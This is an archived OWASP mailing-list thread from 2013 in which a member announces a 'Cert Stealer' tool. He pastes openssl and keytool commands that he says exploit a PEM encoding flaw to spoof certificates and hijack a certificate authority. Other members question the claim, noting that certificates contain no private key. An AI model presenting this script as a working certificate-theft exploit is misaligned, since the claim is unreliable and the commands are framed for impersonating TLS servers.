[Owasp-leaders] Cert Stealer Released

Abbas Naderi abbas.naderi at owasp.org
Thu Dec 26 19:40:48 UTC 2013


Maybe the PEM you’re using is not a cert, but a private key. They are both encoded into PEM files. If you have the private key, then you don’t need to exploit it! You already have it.

And BTW whats the practical use of this, I mean have you used it anywhere? How can it be used to exploit something.
-A
On Dec 26, 2013, at 2:38 PM, Gregory Disney <gregory.disney at owasp.org> wrote:

> openssl s_client -showcerts -connect $host:$port > $keyring.pem; 
> openssl x509 -in $keyring.pem  -pubkey > $keyring.cer;
> keytool -keystore $ks --importcert --alias $keyring.pem -file $keyring.pem -storepass $passwd -noprompt;
> keytool -genkey -alias $keyring.key -keyalg RSA -keystore $ks -storepass $passwd -noprompt
> keytool -v -importkeystore -srckeystore $ks -srcalias $keyring.key -destkeystore $keyring.p12 -file $keyring.p12 -deststoretype PKCS12 -storepass $passwd -noprompt
> openssl pkcs12 -in $keyring.p12 -out $keyring.key -passin pass:$passwd
> echo "Stealing CA"
> cat $keyring.key >> $keyring.pem
> openssl x509 -inform pem -in $keyring.pem -out ca-$keyring.crt -signkey $keyring.key -CA $keyring.key -CAcreateserial 
> 
> This is how I exactly do it, they are checking for public key and private key, I'm not sure why openssl let's you resign as a key. But here is the source for the exploit. 
> 
> On 12/26/13, 11:35 AM, Abbas Naderi wrote:
>> I didn’t quite understand. What does the encoding vulnerability expose? SSL certs are public-keys plus a bunch of other data. There is no private key inside to extract and resign another certificate with.
>> -A
>> On Dec 26, 2013, at 2:32 PM, Gregory Disney <gregory.disney at owasp.org> wrote:
>> 
>>> I think a fair description would be it simplifies spoofing certs. This started out as a proof of concept a year ago when I realized there was a vulnerability in PEM encoding of SSL certs, So I chain-loaded a java key store which was converted to key, then resigned the cert with the chain-loaded key, thus keeping the context of the original certificate with a hijacked authority. 
>>> On 12/26/13, 11:21 AM, Abbas Naderi wrote:
>>>> Well a description of what this does would be a good idea to start with…
>>>> -A
>>>> On Dec 26, 2013, at 2:18 PM, Gregory Disney <gregory.disney at owasp.org> wrote:
>>>> 
>>>>> I'm working on the documentation it works via  turning a a keytool pk12 to openssl key, then embedding the key on the root ca and resigning with the embedded key.
>>>>> On 12/26/13, 10:47 AM, Dinis Cruz wrote:
>>>>>> Hi Gregory, where can I find the details of how this works?
>>>>>> 
>>>>>> Thx
>>>>>> 
>>>>>> Dinis
>>>>>> 
>>>>>> On 26 Dec 2013 07:44, "Gregory Disney" <gregory.disney at owasp.org> wrote:
>>>>>> Screen shot of successfully spoofed certs:
>>>>>> http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png
>>>>>> Each of these cert's have been tested and capable of creating SSL sessions.
>>>>>> Cert Stealer:
>>>>>> https://gist.github.com/gdisneyleugers/8129304
>>>>>> -Greg
>>>>>> _______________________________________________
>>>>>> OWASP-Leaders mailing list
>>>>>> OWASP-Leaders at lists.owasp.org
>>>>>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
>>>>> 
>>>>> _______________________________________________
>>>>> OWASP-Leaders mailing list
>>>>> OWASP-Leaders at lists.owasp.org
>>>>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
>>>> 
>>> 
>> 
> 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.owasp.org/pipermail/owasp-leaders/attachments/20131226/5a5a7ebe/attachment.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 4893 bytes
Desc: not available
URL: <http://lists.owasp.org/pipermail/owasp-leaders/attachments/20131226/5a5a7ebe/attachment.bin>


More information about the OWASP-Leaders mailing list